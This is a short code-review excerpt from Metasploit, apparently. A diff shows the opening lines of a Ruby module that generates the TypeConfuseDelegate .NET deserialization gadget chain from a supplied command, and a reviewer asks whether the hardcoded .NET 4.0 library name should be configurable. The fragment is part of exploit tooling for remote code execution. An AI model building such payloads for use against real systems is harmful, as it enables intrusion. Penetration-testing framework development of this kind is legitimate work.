lib/msf/util/dot_net_deserialization/gadget_chains/type_confuse_delegate.rb

```diff
@@ -0,0 +1,207 @@
+module Msf
+module Util
+module DotNetDeserialization
+module GadgetChains
+
+  class TypeConfuseDelegate < Types::SerializedStream
+
+    # TypeConfuseDelegate
+    #   Credits:
+    #     Finders: James Forshaw
+    #     Contributors: Alvaro Munoz
+
+    def self.generate(cmd)
+      library = Types::RecordValues::BinaryLibrary.new(
+        library_id: 2,
+        library_name: "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
```

Comment:
Should this library name be configurable for other .NET versions? OR is 4.0 the only one supported at this time? I'm guessing the latter because it's the earliest version this issue appears in?